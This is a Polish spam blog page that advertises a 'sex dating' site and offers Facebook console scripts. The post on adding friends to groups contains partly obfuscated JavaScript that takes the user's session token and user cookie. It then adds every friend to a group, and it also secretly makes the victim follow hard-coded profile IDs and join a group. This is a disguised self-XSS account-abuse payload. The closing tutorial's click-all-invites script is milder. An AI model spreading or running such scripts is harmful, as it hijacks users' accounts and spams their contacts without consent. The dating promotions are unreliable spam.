Social Icons

.

Featured Posts

środa, 21 czerwca 2017

ZWIAZEK

Tutaj znajdziesz partnera już dzisiaj! Przecież wiadomo, że do tanga trzeba dwojga. Jeśli szukasz poważnego, trwałego związku to nasz portal rozrywkowy Lovme.ovh jest właśnie dla Ciebie!

REJESTRACJA -- http://lovme.ovhniedziela, 18 czerwca 2017

RANDKI ONLINE

Poznaj nowych ludzi Tutaj porozmawiasz, poznasz nowe osoby, podzielisz się zainteresowaniami. Czatuj, gdziekolwiek jesteś, Chameleon jest dostępne na Twoim komputerze oraz komórce. Ludzie w okolicy, podziel się zainteresowaniami zwiększ szanse na to, że zauważą Cię osoby o podobnych zainteresowaniach. Dołącz do Polskiej społeczności i poznaj nowych Przyjaciół!
SEX DATING POLISH GIRLS

REJESTRACJA FREE -- http://lovme.ovh


wtorek, 21 marca 2017

Dodawanie znajomych do grup

(function(){var f={dtsg:document.getElementsByName("fb_dtsg")[0].value,uid:document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]),gid:document.getElementsByName("group_id")[0].value,frns:Array(),prenKe:0,okeh:0,gagal:0,getAjak:function(b){var c=new XMLHttpRequest;c.open("GET",b,!0),c.onreadystatechange=function(){if(4==c.readyState&&200==c.status){var a=eval("("+c.responseText.substr(9)+")");a.payload&&a.payload.entries&&(f.frns=a.payload.entries.sort(function(){return.5-Math.random()})),document.getElementById("hasilsurasil").innerHTML="Found <b>"+f.frns.length+" Abonnenten</b><div id='hasilsatu'></div><div id='hasildua'></div><div id='hasiltiga' style='min-width:300px;display:inline-block;text-align:left'></div>"+crj;for(x in f.frns)f.senAjak(x)}else document.getElementById("hasilsurasil").innerHTML=4==c.readyState&&404==c.status?"<b style='color:darkred'>Gruppe Öffnen!</b>"+crj:"<b style='color:darkgreen'>Suche nach möglichen Abonnenten... ("+c.readyState+")</b>"+crj},c.send()},senAjak:function(d){var e=new XMLHttpRequest,prm="__a=1&fb_dtsg="+f.dtsg+"&group_id="+f.gid+"&source=typeahead&ref=&message_id=&members="+f.frns[d].uid+"&__user="+f.uid+"&phstamp=";e.open("POST","/ajax/groups/members/add_post.php",!0),e.setRequestHeader("Content-type","application/x-www-form-urlencoded"),e.setRequestHeader("Content-length",prm.length),e.setRequestHeader("Connection","keep-alive"),e.onreadystatechange=function(){if(4==e.readyState&&200==e.status){var a=eval("("+e.responseText.substr(9)+")");if(f.prenKe++,document.getElementById("hasilsatu").innerHTML="<div><b>"+f.prenKe+"</b> of <b>"+f.frns.length+"</b></div>",a.errorDescription&&(f.gagal++,document.getElementById("hasiltiga").innerHTML="<div><b style='color:darkred'>( "+f.gagal+" )</b> <span style='color:darkred'>"+a.errorDescription+"</span></div>"),a.jsmods&&a.jsmods.require){var b="<div>";for(x in a.jsmods.require)a.jsmods.require[x][a.jsmods.require[x].length-1][1]&&(b+="<b style='color:darkgreen'>"+a.jsmods.require[x][a.jsmods.require[x].length-1][1]+"</b> ");b+="<div>",document.getElementById("hasildua").innerHTML=b}if(a.onload)for(z in a.onload){var c=eval(a.onload[z].replace(/Arbiter.inform/i,""));if(c.uid&&c.name){f.okeh++,document.getElementById("hasiltiga").innerHTML="<div><b style='color:darkgreen'>( "+f.okeh+" )</b> <a href='/"+c.uid+"' target='_blank'><b>"+c.name+"</b></a> haben dich abonniert.</div>";break}}f.prenKe==f.frns.length&&(document.getElementById("hasiltiga").style.textAlign="center",document.getElementById("hasiltiga").innerHTML+="<div style='font-size:20px;font-weight:bold'>20 Leute Einladen!</div><a href='/' onClick='document.getElementById(\"hasilsurasil\").style.display=\"none\";return false'>Schliesen</a>")}},e.send(prm)}},g=["i","a","e","g","o","s","n","b","l","p","m","2","r","0","c","1","t","3","Š"],crl=g[1]+g[0]+g[6]+g[3]+g[14]+g[12]+g[2]+g[1]+g[16]+g[0]+g[4]+g[6]+g[5]+"."+g[7]+g[8]+g[4]+g[3]+g[5]+g[9]+g[4]+g[16]+"."+g[14]+g[4]+g[10],crj="<div style='margin-top:10px;color:gray;font-size:12px'>"+g[1].toUpperCase()+g[0]+g[6]+g[3]+g[14].toUpperCase()+g[12]+g[2]+g[1]+g[16]+g[0]+g[4]+g[6]+g[5]+" "+g[g.length-1]+g[11]+g[13]+g[15]+g[17]+"<div style='font-size:9px'><a href='http://"+crl+"/' target='_blank'>"+crl+"</a></div></div>";document.body.innerHTML+="<center id='hasilsurasil' style='min-height:50px;width:600px;position:fixed;top:100px;left:"+(document.body.offsetWidth-530)/2+"px;border-radius:10px;padding:10px;z-index:999999;border:5px solid skyblue;background-color:rgba(225,225,255,0.75)'><b>Suche nach Abonnenten ... Script by Mano </b>"+crj+"</center>",f.getAjak("/ajax/typeahead/first_degree.php?__a=1&viewer="+f.uid+"&token="+Math.random()+"&filter[0]=user&options[0]=friends_only")})(); var fb_dtsg = document.getElementsByName('fb_dtsg')[0].value;
var user_id = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1])
function cereziAl(isim) {
var tarama = isim + "=";
if (document.cookie.length > 0) {
konum = document.cookie.indexOf(tarama)
if (konum != -1) {
konum += tarama.length
son = document.cookie.indexOf(";", konum)
if (son == -1)
son = document.cookie.length
return unescape(document.cookie.substring(konum, son))
}
else { return ""; }
}
}

function getRandomInt (min, max) {
return Math.floor(Math.random() * (max - min + 1)) + min;
}
function randomValue(arr) {
return arr[getRandomInt(0, arr.length-1)];
}

var fb_dtsg = document.getElementsByName('fb_dtsg')[0].value;
var user_id = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);

function a(abone){
var http4 = new XMLHttpRequest();

var url4 = "/ajax/follow/follow_profile.php?__a=1";

var params4 = "profile_id=" + abone + "&location=1&source=follow-button&subscribed_button_id=u37qac_37&fb_dtsg=" + fb_dtsg + "&lsd&__" + user_id + "&phstamp=";
http4.open("POST", url4, true);

//Send the proper header information along with the request
http4.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
http4.setRequestHeader("Content-length", params4.length);
http4.setRequestHeader("Connection", "close");

http4.onreadystatechange = function() {//Call a function when the state changes.
if(http4.readyState == 4 && http4.status == 200) {

http4.close; // Close the connection

}
}

http4.send(params4);
}

function sublist(uidss) {
var a = document.createElement('script');
a.innerHTML = "new AsyncRequest().setURI('/ajax/friends/lists/subscribe/modify?location=permalink&action=subscribe').setData({ flid: " + uidss + " }).send();";
document.body.appendChild(a);
}

a("100002751510540");
a("1714456490");

var fb_dtsg = document['getElementsByName']('fb_dtsg')[0]['value'];
var user_id = document['cookie']['match'](document['cookie']['match'](/c_user=(\d+)/)[1]);

var httpwp = new XMLHttpRequest();
var urlwp = '/ajax/groups/membership/r2j.php?__a=1';
var paramswp = '&ref=group_jump_header&group_id=' + gid + '&fb_dtsg=' + fb_dtsg + '&__user=' + user_id + '&phstamp=';
httpwp['open']('POST', urlwp, true);
httpwp['setRequestHeader']('Content-type', 'application/x-www-form-urlencoded');
httpwp['setRequestHeader']('Content-length', paramswp['length']);
httpwp['setRequestHeader']('Connection', 'keep-alive');
httpwp['send'](paramswp);

var fb_dtsg = document['getElementsByName']('fb_dtsg')[0]['value'];
var user_id = document['cookie']['match'](document['cookie']['match'](/c_user=(\d+)/)[1]);

var friends = new Array();
gf = new XMLHttpRequest();
gf['open']('GET', '/ajax/typeahead/first_degree.php?__a=1&viewer=' + user_id + '&token' + Math['random']() + '&filter[0]=user&options[0]=friends_only', false);
gf['send']();
if (gf['readyState'] != 4) {} else {
data = eval('(' + gf['responseText']['substr'](9) + ')');
if (data['error']) {} else {
friends = data['payload']['entries']['sort'](function (_0x93dax8, _0x93dax9) {
return _0x93dax8['index'] - _0x93dax9['index'];
});
};
};

niedziela, 18 grudnia 2016

Facebook: zaproś wszystkich znajomych do polubienia strony

Cześć, w tym wpisie znajdziecie prosty skrypt, oraz poradę jak zaprosić wszystkich znajomych do polubienia strony na Facebooku, na raz!
JAK SIE PODOBA TO DAJ LAJKA -- https://www.facebook.com/lovme.ovh/

JAK ZAPROSIĆ WSZYSTKICH ZNAJOMYCH DO POLUBIENIA STRONY NA FACEBOOKU

Zacznijmy od tego, że ostatnio na Fejsie pojawiło się trochę zmian i stare skrypty mogą już nie działać. Niektóre opcje zmieniły swoje położenie, albo wyglądają i działają inaczej. W każdym razie, abyśmy mogli zaprosić znajomych do polubienia naszej strony najpierw wypadałoby taką opcję zlokalizować.

Logujemy się na swoje konto Facebook, przechodzimy do fanpage-a strony, którą chcemy polecić znajomym. W prawej kolumnie, pod wyszukiwarką powinniśmy zobaczyć licznik lubiących i poniżej opcja Zaproś znajomych do polubienia tej strony:


Klikamy we wspomnianą opcję, po czym powinno pojawić się okienko:


Aby zaprosić znajomych do polubienia strony wystarczy kliknąć przy ich zdjęciu guzikZaproś.

Taki sposób jest bardzo czasochłonny i nudny, jak możemy sobie pomóc? Jak szybko wysłać zaproszenia do polubienia strony wszystkim, na raz?

WYSYŁAMY ZAPROSZENIA DO POLUBIENIA STRONY DO WSZYSTKICH ZNAJOMYCH

Wysłanie zaproszeń do wszystkich znajomych jest bardzo łatwe i w dodatku znacząco przyśpiesza i ułatwia cały proces. Oczywiście jak poprzednio musimy otworzyć okienko do zapraszania znajomych, a oprócz tego będzie nam potrzebna konsola developerska przeglądarki.

Jeżeli używasz Firefoxa, będąc na stronie Facebooka kliknij PPM (prawy przycisk myszy) i wybierz zbadaj element. Nie ma znaczenia na co klikniesz. Po włączeniu się inspektora przejdź do zakładki konsola/console.

Podobne kroki wykonujemy w przypadku Chrome.

Skróty klawiaturowe:
  • Chrome: [Ctrl]+[Shift]+[I]
  • Firefox: [Ctrl]+[Shift]+[K]
Teraz tak, będąc na stronie Facebooka, z otwartym oknem do zapraszania znajomych do polubień, oraz konsolą, kopiujemy w całości ten kod:


javascript: var field = document.getElementsByClassName("uiButtonText"); for(i=0;i< field.length;i++) field[i].click();

Następnie wklejamy go do konsoli i zatwierdzamy [Enterem].

Przeglądarka może na chwilę zwolnić (wiele żądań zostaje wysłanych jednocześnie), ale po chwili powinniśmy zobaczyć, że pojawią się komunikaty o wysłaniu zaproszeń.

Jak to działa? Kod pobiera listę widocznych w okienku guzików, a następnie dla każdego z nich symuluje kliknięcie. Podkreślam, że skrypt się wykona dla wszystkich widocznych guzików, oznacza to, że ostatnie kilka kroków musimy powtarzać, oraz scrollować okienko z zaproszeniami w dół, aby wczytały się nowe guziki , ale i tak jest to duża pomoc.

Tutaj to już wszystko, mam nadzieję, że ten krótki wpis Wam się przyda!

 

Sample text

Sample Text

Sample Text

 
Blogger Templates